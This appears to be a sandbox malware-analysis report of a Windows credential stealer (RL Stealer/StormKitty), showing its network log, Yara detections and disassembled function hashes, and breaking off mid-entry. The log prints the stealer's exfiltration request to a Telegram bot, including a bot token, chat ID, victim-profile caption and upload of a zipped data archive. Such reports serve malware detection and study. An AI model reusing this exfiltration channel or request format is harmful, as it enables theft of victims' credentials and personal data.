2024-07-07 05:06:08 UTC	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
2024-07-07 05:06:08 UTC	211	IN	HTTP/1.1 200 OK Date: Sun, 07 Jul 2024 05:06:08 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 89f54db1cbbf4270-EWR
2024-07-07 05:06:08 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49749	104.26.12.205	443	7340	C:\Users\user\Desktop\B5U2ccQ8H1.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-07 05:06:10 UTC	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
2024-07-07 05:06:10 UTC	211	IN	HTTP/1.1 200 OK Date: Sun, 07 Jul 2024 05:06:10 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 89f54dbd99460f67-EWR
2024-07-07 05:06:10 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49750	149.154.167.220	443	7340	C:\Users\user\Desktop\B5U2ccQ8H1.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-07 05:06:10 UTC	1519	OUT	POST /bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendDocument?chat_id=5795480469&caption=====%20RL%20STEALER%20====%20%0A%E2%8F%B0%20Date%20=%3E%2007/07/2024%201:05%0A%F0%9F%92%BBSystem%20=%3E%20Windows%2010%20Pro%20(64%20Bit)%0A%F0%9F%91%A4%20User%20=%3E%20user%0A%F0%9F%86%94%20PC%20=%3E%20928100%0A%F0%9F%8F%B4%20Country%20=%3E%20[United%20States]%0A%F0%9F%94%8D%20IP%20=%3E%208.46.123.33%0A%F0%9F%93%9D%20Language%20=%3E%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0A%F0%9F%94%93%20Antivirus%20=%3E%20Windows%20Defender.%0A%20====%7B%20User%20Data%20%7D====%0A%F0%9F%93%82%20FileGrabber%20=%3E%2061%0A%F0%9F%93%A6%20Telegram%20=%3E%20%E2%9D%8C%0A%F0%9F%92%B8%20Wallets%20=%3E%20%E2%9D%8C%0A%F0%9F%92%AC%20Discord%20=%3E%20%E2%9D%8C%0A%F0%9F%93%A1%20FileZilla:%20%E2%9D%8C%0A%20VimeWorld%20=%3E%20%E2%9D%8C%0A%20====%7B%20VPN%20%7D====%0A%20%E2%88%9F%20NordVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20OpenVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20ProtonVPN%20=%3E%20%E2%9D%8C%0A%20====%7B%20Browsers%20Data%20%7D====%0A%F0%9F%97 [TRUNCATED] Content-Type: multipart/form-data; boundary=------------------------8dc9ebfd23c8782 Host: api.telegram.org Content-Length: 719872 Expect: 100-continue Connection: Keep-Alive
2024-07-07 05:06:11 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-07 05:06:11 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 65 62 66 64 32 33 63 38 37 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 39 32 38 31 30 30 5c 40 5b 55 6e 69 74 65 64 20 53 74 61 74 65 73 5d 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 4b 03 04 2d 00 01 00 08 00 c1 08 e7 58 7e a1 2d 20 ff ff ff ff ff ff ff ff 0f 00 38 00 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 74 Data Ascii: --------------------------8dc9ebfd23c8782Content-Disposition: form-data; name="document"; filename="C:\Users\user\AppData\Roaming\928100\@[United States].zip"Content-Type: application/x-ms-dos-executablePK-X~- 8Information.t
2024-07-07 05:06:11 UTC	16355	OUT	Data Raw: f5 c7 26 28 3e cd e3 da 0e 89 94 dc 2f 2d 1b de d8 15 6f af 68 2b d9 84 ae 46 3b 1b 5f 5e 47 32 5f 87 d5 4f 29 fc ef 3e 67 5e c5 14 3d ef 39 a9 69 a4 a7 e9 65 a9 f4 bb 36 18 a6 6b 2f d6 cd be 0e 9a c3 73 cc e3 5f 2c e0 5a 5f 00 ee 6c 23 f5 87 a2 2f 97 a4 c2 72 e1 57 2d f1 64 10 d1 64 4e a4 d4 ff c0 92 24 c9 be b9 a1 5e 00 98 c7 cc 5a 06 51 1e 2c 78 9a 51 a8 d0 72 98 8e ba 95 f5 24 fc 65 06 6f b3 08 01 b4 4d c8 ae a6 4d 9c f9 fc 7c ee f0 38 48 06 52 90 2a ee 7d 6d f4 57 21 17 60 14 d7 fe 86 1d 72 e1 9c f3 2e 0e 67 da 81 7b 35 87 8f d1 22 33 56 f2 a5 b9 a9 a6 ea 21 71 f6 5e 50 4d 8a 16 66 72 d0 15 52 c2 25 00 c9 97 c7 6b f7 24 db 4c 04 7a 35 de 58 7a ef 59 5f 89 bb d3 1b d6 c9 17 85 62 a8 db 6a c1 d5 07 0a 06 8c ef 50 ea 8a ee 30 6e fa 34 72 45 4e f7 62 73 Data Ascii: &(>/-oh+F;_^G2_O)>g^=9ie6k/s_,Z_l#/rW-ddN$^ZQ,xQr$eoMM\|8HR*}mW!`r.g{5"3V!q^PMfrR%k$Lz5XzY_bjP0n4rENbs
2024-07-07 05:06:11 UTC	16355	OUT	Data Raw: ad 15 bb 8a 55 5b ef 14 bb ea ba 99 5d 1a 5f e6 6c e9 18 c6 34 39 7e b5 15 35 be da 03 7a 43 5a fb d0 97 3e 37 f1 ef 72 8f 61 d8 dc 70 17 65 74 74 88 14 5f bc b3 b7 41 e5 8b 49 bb b2 43 a1 7a 54 1f ff 74 a7 14 ed 79 ac 18 fc cf 2b 3d 5d d7 57 a3 7c 4a 5b d1 3a 7a 7a 5a 68 b6 8b 02 52 d6 b8 1a 42 f9 08 08 76 fe a6 5b 90 0b 14 ac 37 25 5f ab 6d 7f b6 94 52 40 75 17 dd 77 d7 b2 3c 98 ba 1b a0 74 ab ee c8 47 06 9f fa 60 df 08 15 c3 e7 e2 f9 87 f7 1a 59 f0 8f 02 94 c8 3b 16 ee fd 3b 91 db f3 ce f7 b5 74 97 19 78 67 24 b6 a8 88 24 dc a6 e8 e9 f3 ce 60 81 fb 43 d3 b9 90 e1 82 20 f0 48 75 88 b1 37 3c 77 e5 f3 13 bc 96 5e eb 62 14 f9 fa c5 12 31 5c 07 87 fc 2b 10 db 44 28 ac ae fb 0f 42 84 03 cc f0 96 e4 46 20 00 2d d9 a9 37 ae 5d 3f 63 a1 81 bc e5 4c aa 4b a1 fc Data Ascii: U[]_l49~5zCZ>7rapett_AICzTty+=]W\|J[:zzZhRBv[7%_mR@uw<tG`Y;;txg$$`C Hu7<w^b1\+D(BF -7]?cLK
2024-07-07 05:06:11 UTC	16355	OUT	Data Raw: 4b 8b 2f a0 a2 d4 c5 04 82 e6 5c 92 a7 fa 85 0d c1 fd c2 c9 54 d2 ca 7b 0e 54 90 60 67 37 c5 18 22 ab 33 f0 da 5a 0f 18 19 45 aa 85 d7 d3 59 72 e6 01 74 c1 10 85 8a 09 44 41 76 0b 18 90 37 29 96 65 62 e5 2d d9 0c de 4f b6 7e 9b e4 2f 0b 77 1c 88 62 d2 df 52 e4 74 fa b7 f3 0f e2 5c 24 ba 84 03 6c f9 09 9d 04 51 0e 52 b9 85 b0 7f 5a 51 f1 05 cb b7 41 21 46 6a d3 ff e4 d8 0f 7f e1 97 2e d7 b7 b1 84 59 c4 82 98 21 e6 48 d9 23 9b 18 1a bf 29 e2 7e c4 37 f9 69 96 17 ee dd 4c 4e 47 a7 e7 31 ff 21 ea fe d5 02 df 81 eb 93 3c 06 2b 1f a2 9c d0 72 ef b4 71 94 b4 09 64 1a 91 9e fa 18 37 11 1f 6e f3 01 aa f0 d0 13 a6 b3 57 d4 63 0d 61 c7 0c c6 2f 8d b7 6c bb 7c d0 c7 0d f9 4f f8 0e 41 9e 1d 18 c5 60 c8 8f e0 fe 3c 8a 99 7f ed 42 de 33 4e 43 37 f8 5d c7 31 ba c0 57 0c Data Ascii: K/\T{T`g7"3ZEYrtDAv7)eb-O~/wbRt\$lQRZQA!Fj.Y!H#)~7iLNG1!<+rqd7nWca/l\|OA`<B3NC7]1W
2024-07-07 05:06:11 UTC	16355	OUT	Data Raw: 56 4b 5b 28 6f c6 86 73 3c c7 b6 89 d9 f3 2c 4b 00 fc 88 3e 48 8b 10 2e fa 0c 38 9d ec 4c fe 05 47 19 08 40 24 92 7e c8 54 26 36 a1 50 2f 72 7e ba a6 12 67 7f f6 1b 18 17 49 b0 70 ae 2f 0a 2a 01 cf d1 bb 33 55 83 d7 4f 3f d2 45 48 8f 1f 89 82 2a ed 6c 2b 31 48 85 40 26 83 96 d6 ee 1e 59 85 36 59 22 b4 56 17 8d 96 26 f9 d2 86 e8 83 2e 3a 84 7d fd 11 5b 2c 26 ca b7 a2 b1 86 b3 d7 c9 cd fd ee fa 78 5f 04 34 a8 14 6e 8f ee da cb 27 82 49 ae 40 ce d1 c6 ca c4 8a 56 45 4b 8c cc 38 ad 15 24 07 42 e1 62 e7 90 a4 8a ce b0 ea 98 83 dc 96 59 b6 47 df 1f f6 84 a0 1f b2 fd 6c c5 c9 47 ca c9 87 c6 5a d9 e3 4d ad 2b 47 0f 2e 13 bf 7f 4c 21 88 9b 4b bf 11 37 9c b2 17 fe e4 a6 53 c0 48 d6 0a aa f8 06 c9 b2 53 bf 98 e5 1a 76 1c 71 07 39 05 60 76 4c 82 85 db 6c ba 85 59 8c Data Ascii: VK[(os<,K>H.8LG@$~T&6P/r~gIp/3UO?EHl+1H@&Y6Y"V&.:}[,&x_4n'I@VEK8$BbYGlGZM+G.L!K7SHSvq9`vLlY
2024-07-07 05:06:11 UTC	16355	OUT	Data Raw: 26 ec 8e bd b0 db 7e 4d a8 f9 5d b3 bb d0 e7 dd ca 4e 3e c6 8f 6f ae 6b 37 b3 e8 f7 f0 26 45 a5 43 9e 7c f5 65 12 4c b3 30 33 aa 28 6d a5 6d 3c 60 c1 0c b4 75 68 29 d6 73 73 78 6c 6d e7 aa 73 f2 a3 3b dd 7d e3 d7 99 fe 79 07 ca 48 9a b7 b7 30 cf 2d b2 a8 bc 9f 1a ae a8 ee 43 9c 39 37 ea 5e 33 af 7c 6d 7e 6b 2b 04 0f c4 23 19 08 50 9c c5 4e 4e 32 01 74 19 00 94 9d 32 dc 11 98 8a 90 ee 31 f5 eb 63 c1 df 16 12 4f 96 3d dd 3f 9f 23 e3 b5 e4 85 be 9a b0 10 54 b8 f6 8f 86 83 64 35 7b cd 4f 9d 43 8d d1 08 85 6b ec c2 10 8a d6 ea 3f 4b 56 5d d1 e4 ac f3 34 dd b9 f5 c5 30 04 9e 64 9b 9c 30 95 82 c2 8f 8d b9 91 74 56 35 1d 3a 38 cb 93 e6 68 86 ab 7a 2c 4a 6f 78 03 e5 76 e3 85 0f 5e 38 46 6e 34 43 de 3c e3 ec d7 80 8c b6 ce 81 0d e1 75 8c b7 d0 06 54 2f 7e 4d f5 08 Data Ascii: &~M]N>ok7&EC\|eL03(mm<`uh)ssxlms;}yH0-C97^3\|m~k+#PNN2t21cO=?#Td5{OCk?KV]40d0tV5:8hz,Joxv^8Fn4C<uT/~M
2024-07-07 05:06:11 UTC	16355	OUT	Data Raw: 80 b4 6c f3 69 85 8b 99 ea c6 cf 84 cd 5a d5 90 33 e2 c5 6d c4 a2 71 b4 4a 26 d6 ce 02 d1 bc c3 73 db 24 e7 8e e6 30 37 98 66 15 0d 04 c1 79 1e bc 3f 57 b7 b8 63 3c cb 1e ef 66 76 da f1 f7 62 db df 0c b6 50 8b fa 32 76 9f 0d ce 8b 3b e3 19 03 cf 94 ca e3 35 62 85 35 8a f5 a0 46 9e fa d4 49 41 43 db d0 dd ec 5a 40 d7 7c 92 dd 6e 4b e9 e3 82 23 14 e7 4d 78 d7 2c 0c aa 16 41 a7 36 35 b0 ce 85 61 66 ec 26 09 12 ed ea 1b ba a2 10 86 38 58 8e ee b2 2a 01 f6 0e 17 19 7a 99 0a b8 ee 9b 8d 42 66 1c b9 1c 95 5a 12 24 52 c0 bd 69 ee 8b 24 3a 7a 1c 75 84 a2 86 4d 5c 6c 6d d9 9c 0e 6f fa ad 9f 28 0e 71 59 1b e0 50 06 c5 1f 89 10 be a9 ad ed 9e c7 c9 fe d6 fb 9b d9 b6 59 b0 a3 db bf 17 7a 3a 80 a5 01 c6 64 3f f5 ef 49 f1 53 65 44 bb a5 d6 c1 37 2e f4 34 be 0b 2c 5e f5 Data Ascii: liZ3mqJ&s$07fy?Wc<fvbP2v;5b5FIACZ@\|nK#Mx,A65af&8X*zBfZ$Ri$:zuM\lmo(qYPYz:d?ISeD7.4,^
2024-07-07 05:06:11 UTC	16355	OUT	Data Raw: ff ef 63 28 1a b5 8e 82 88 12 e0 c4 29 6c 62 65 bd fe cf 01 a1 fe bb 39 80 2a aa f7 0c 17 af 51 85 7f 6d 2b b8 b3 61 dd a9 8b 01 b5 f9 d9 67 5d 63 51 4c e5 7f 4f 6f d3 37 5e 54 e8 57 d3 cf 44 45 d3 84 f0 3d 5c b0 70 96 b0 8c 28 31 c7 f7 ad c7 3f f1 c6 95 0d 27 2d a9 6f 72 dc 49 f4 6f fb 91 9a 1a ed bf e1 56 d2 d5 c1 60 45 af d9 96 e9 9b 04 9e e3 ad ba 32 17 d8 47 40 6a e6 09 ec 68 de d8 95 ce 56 43 01 1b ae ba aa 25 37 82 98 72 a6 ef 4a 2a 3a db ef 36 f0 ed 8c f0 08 8e 10 96 43 49 34 d5 e9 73 e1 09 ee ec 9d 05 a1 50 fa 9d 64 c1 ac 70 0e 0c ce 50 03 2c 4a 44 1f 97 96 be f1 1b a3 04 5e 84 40 96 f6 39 21 eb cf bf 20 74 0f 86 6f f8 1d 39 b0 76 2f 62 71 f1 0d 38 5f c9 80 53 32 fd 27 0c 0e e4 c1 4d 4a ec 17 10 45 78 f0 71 d9 be 0c d7 44 09 c6 b2 e7 76 53 f0 4c Data Ascii: c()lbe9Qm+ag]cQLOo7^TWDE=\p(1?'-orIoV`E2G@jhVC%7rJ:6CI4sPdpP,JD^@9! to9v/bq8_S2'MJExqDvSL
2024-07-07 05:06:11 UTC	16355	OUT	Data Raw: 2b 41 21 31 7f d7 57 6d 53 81 32 e7 76 1f d1 d6 a7 05 85 7a 68 1f c3 c5 60 d1 74 a8 64 43 5e 5b b5 a7 f4 4d 1e f1 43 b9 70 6f aa 7f 05 86 99 8c 35 45 4f 16 b4 e2 fc 10 ef 81 04 ca af c2 99 9c d8 44 4a 4f bb 89 61 34 38 29 06 63 27 2b c2 1a 6f 6b 92 d3 29 ed ff cf 0b 97 5c 84 64 88 fb 20 3d ec 86 dd 8c 18 ca 42 e5 fb de 38 b6 fa 56 dd cf bd 46 88 1c b5 8d 5c b8 56 10 89 e8 87 f4 7b 60 b9 d8 89 55 d6 10 d5 9f 12 ce 4f 5f 83 09 43 47 6c a4 aa 7e 63 80 79 54 9a db cf 01 ac 83 f5 5f fb ae 6f 5f 97 99 c0 bd e6 42 79 03 db 48 26 90 e5 c7 ca 9e ca df ac 43 29 4a 65 35 84 e5 bd 44 a5 6f be be 35 e5 a0 4b 74 34 cf 12 82 de 8c a5 98 34 71 0b 33 7c ea e7 83 88 8d 0f 8a 46 03 36 5f df 8e fb 2b f5 0d 0f 44 34 70 6e f3 ab 9a 37 6c 70 ac f9 19 b6 1a 0d ac e0 3a d9 e7 a8 Data Ascii: +A!1WmS2vzh`tdC^[MCpo5EODJOa48)c'+ok)\d =B8VF\V{`UO_CGl~cyT_o_ByH&C)Je5Do5Kt44q3\|F6_+D4pn7lp:
2024-07-07 05:06:11 UTC	16355	OUT	Data Raw: 00 c8 89 c9 e6 34 4e a0 da e0 f7 73 ab 80 a0 9b 06 ac ee 67 4c 8f 3b 3b 9b 03 14 79 3b 12 64 91 46 27 35 50 45 e7 f7 18 1a 3c 84 46 9d 05 a4 e7 2e a3 f2 34 3d 7d c6 82 71 b1 c9 ae 5b 1f a9 ab 67 b1 c8 9f 46 5b 3a 8e 66 cc 0b 77 72 65 44 63 ae 57 b4 33 3e 78 90 fe bb a3 19 4b d8 6c ee 20 27 86 d1 bb 4c aa a4 7f ae 57 b1 49 7f 3e 28 96 d2 b6 c2 95 13 ca f8 00 bf ff 95 97 6a 55 6b 24 2d a7 b2 f9 3e 3c 9e b2 2e 25 d2 c3 aa 52 5f 0a aa 5d 7a c1 36 fc a6 12 49 e7 7d 0f bc 17 ee e1 4f eb 6c 10 df 04 a5 1c 12 c4 fd 24 0a 6e 9c 6b ff b8 1c 91 be 9a c3 ea 37 58 c0 4b d1 ec 55 91 69 98 b1 23 9e 52 3a 70 f4 98 c4 d0 a4 05 d3 cd c3 06 76 dc db 9a 58 05 cc 70 e1 86 17 ee 98 13 1c 2e 4e af 72 5f 4f 01 49 79 61 c4 33 e6 8f ca 63 c8 35 8c cd 2e fe 20 66 97 1b 60 79 e4 65 Data Ascii: 4NsgL;;y;dF'5PE<F.4=}q[gF[:fwreDcW3>xKl 'LWI>(jUk$-><.%R_]z6I}Ol$nk7XKUi#R:pvXp.Nr_OIya3c5. f`ye
2024-07-07 05:06:12 UTC	402	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Sun, 07 Jul 2024 05:06:11 GMT Content-Type: application/json Content-Length: 56 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":400,"description":"Logged out"}

Target ID:	0
Start time:	01:05:56
Start date:	07/07/2024
Path:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\B5U2ccQ8H1.exe"
Imagebase:	0x2f0000
File size:	328'192 bytes
MD5 hash:	86108D3BCC19FE774CC81B71494D31F9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RLSTEALER, Description: Yara detected RL STEALER, Source: 00000000.00000002.1815490202.0000000002A84000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RLSTEALER, Description: Yara detected RL STEALER, Source: 00000000.00000002.1815490202.0000000002A75000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000000.1658789791.00000000002F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1658789791.00000000002F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.1658789791.00000000002F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_RLSTEALER, Description: Yara detected RL STEALER, Source: 00000000.00000000.1658789791.00000000002F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000000.1658789791.00000000002F2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000002.1815490202.0000000002651000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1815490202.0000000002651000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1815490202.0000000002651000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RLSTEALER, Description: Yara detected RL STEALER, Source: 00000000.00000002.1815490202.0000000002651000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.1815490202.0000000002651000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	16.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	30.8%
Total number of Nodes:	13
Total number of Limit Nodes:	0

Executed Functions

Function 04DF47B8 Relevance: 3.5, Strings: 2, Instructions: 972COMMON

Download Yara Rule

Strings

-, xrefs: 04DF4A81
c, xrefs: 04DF4DE4

Memory Dump Source

Source File: 00000000.00000002.1823325244.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID: -$c
API String ID: 0-3934772709
Opcode ID: ec38927e96a3678563be5f03905f5339554b596e22f1b623e71e092666da350e
Instruction ID: 432fe02f19adf59fbc6701a39327b55f9ee3f32e238b3a9b15ec372ae9688396
Opcode Fuzzy Hash: ec38927e96a3678563be5f03905f5339554b596e22f1b623e71e092666da350e
Instruction Fuzzy Hash: 07B2B275E012298FDB24CF68C985BEEBBB1BB49305F1585E9D908A7352C734AAC1CF50

Function 04E032EF Relevance: 2.8, Strings: 2, Instructions: 337
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Dmq, xrefs: 04E03476
<, xrefs: 04E03691

Memory Dump Source

Source File: 00000000.00000002.1823382864.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e00000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID: <$Dmq
API String ID: 0-3443129199
Opcode ID: 9c74bcccc76aa9b4f4be434d6511f9ee820233a3b4a9525f964e43730a644ee1
Instruction ID: 438c81d2e93a0d87d716c370451d216a9f135d1c241ae9ad40e07d7949fb6ffa
Opcode Fuzzy Hash: 9c74bcccc76aa9b4f4be434d6511f9ee820233a3b4a9525f964e43730a644ee1
Instruction Fuzzy Hash: 2AF1C375E01228DFDB65DFA4C884BDDBBB2FF48304F1095A9E519AB291DB306A85CF10

Function 04DFBE02 Relevance: 2.0, Strings: 1, Instructions: 757
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 04DFC123

Memory Dump Source

Source File: 00000000.00000002.1823325244.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: afe4cf8c335442e95b6ffa0c5013fda7c81a482dd99ee30238825265bf376e56
Instruction ID: 2c89d358eb1b9620b50789a8ac680dc77415e5497828eff95aa8d609cc5a375d
Opcode Fuzzy Hash: afe4cf8c335442e95b6ffa0c5013fda7c81a482dd99ee30238825265bf376e56
Instruction Fuzzy Hash: F882C074A10268CFDB64CF69C884B9DBBF1BB48310F1585AAE50DAB251D734AEC9CF50

Function 00E23CD0 Relevance: 1.8, APIs: 1, Instructions: 348
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 00E23E06

Memory Dump Source

Source File: 00000000.00000002.1815163637.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_B5U2ccQ8H1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 79abb9e95c5ee8ce0405b20181fdeec24bf7a49cbf1e466f075134e1359257e6
Instruction ID: 95c0601ac485d4226be29087f53dc9139ed639e4700f799b0e418eaeaa2ba51f
Opcode Fuzzy Hash: 79abb9e95c5ee8ce0405b20181fdeec24bf7a49cbf1e466f075134e1359257e6
Instruction Fuzzy Hash: F6F1B174E00228CFDB24DFA5D984B9DBBB2BF89300F2091A9D949A7355DB305E85CF50

Function 04E03010 Relevance: 1.4, Strings: 1, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Tefq, xrefs: 04E03178

Memory Dump Source

Source File: 00000000.00000002.1823382864.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e00000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID: Tefq
API String ID: 0-1066582953
Opcode ID: e357f39257dd3b979b905d9c89fb67844ad4dfb7b4f3adc0e97f1eed315397ed
Instruction ID: b8e8e49979b7a6b0a37c98eb795e45c0abe7256a4e94b6b4b15b8e7db6ed80c0
Opcode Fuzzy Hash: e357f39257dd3b979b905d9c89fb67844ad4dfb7b4f3adc0e97f1eed315397ed
Instruction Fuzzy Hash: 0E61C9B0D01269CFEB24CFA6C95879EBBB2BF84304F10D5AAC419B7294DB751A85CF50

Function 04E012D8 Relevance: 1.2, Instructions: 1234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1823382864.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e00000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7692828d7fc041eb1066f603603552490ae8aa0dd97226c45b7d931ce2ffabe8
Instruction ID: a2eb5e8ef2938e09957f905667915269619fbe067e6c3945be5335115a6c969c
Opcode Fuzzy Hash: 7692828d7fc041eb1066f603603552490ae8aa0dd97226c45b7d931ce2ffabe8
Instruction Fuzzy Hash: 07D2C275A002598FCB64CF58C984BEDBBF2AF49305F1591E6D908AB352C735AE81CF50

Function 04C70040 Relevance: 1.0, Instructions: 967COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1823060216.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c70000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7cf38fea738f654ce9a28af3671b3ba13611a05a73069db7c887d72d5920182
Instruction ID: ef5cce998347e2117f2247ed298573abdda95bbf2d7d46bc76515e70045fb2c5
Opcode Fuzzy Hash: f7cf38fea738f654ce9a28af3671b3ba13611a05a73069db7c887d72d5920182
Instruction Fuzzy Hash: 9FA2B374A01229CFDB64DF69C984BDDBBB2BF48310F1491A9D908AB355DB70AE85CF40

Function 04DFCAA1 Relevance: .5, Instructions: 541COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1823325244.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0ad60c974e198fb3e1f688948128f687d28abba74d30f91a6229567df93e319
Instruction ID: 322df5b72aeaa35743514075c2f948e0dd5d40a574340965b036c60fa7242186
Opcode Fuzzy Hash: b0ad60c974e198fb3e1f688948128f687d28abba74d30f91a6229567df93e319
Instruction Fuzzy Hash: BA42C474A05229CFEB24CF69C984FA9BBF1BF49300F1582E5D449A7292D734AE85CF50

Function 04DFEE00 Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1823325244.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_B5U2ccQ8H1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1befd685b3cfca87a8dac31db937a0dda46d90cc88a64547b6754b8503a0c97
Instruction ID: df4b3f87dc5bb6a4c82c9ddb32e20e95ba1d1ac4f6ed131923cb4320a985820a
Opcode Fuzzy Hash: d1befd685b3cfca87a8dac31db937a0dda46d90cc88a64547b6754b8503a0c97
Instruction Fuzzy Hash: 54228F74E01219CFCB54CF99C584A9EFBF2BF49310F2591AAE908AB355D731A981CF50

Function 04DF0040 Relevance: .4, Instructions: 442COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1823325244.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4df0000_B5U2ccQ8H1.jbxd

Similarity

API ID:
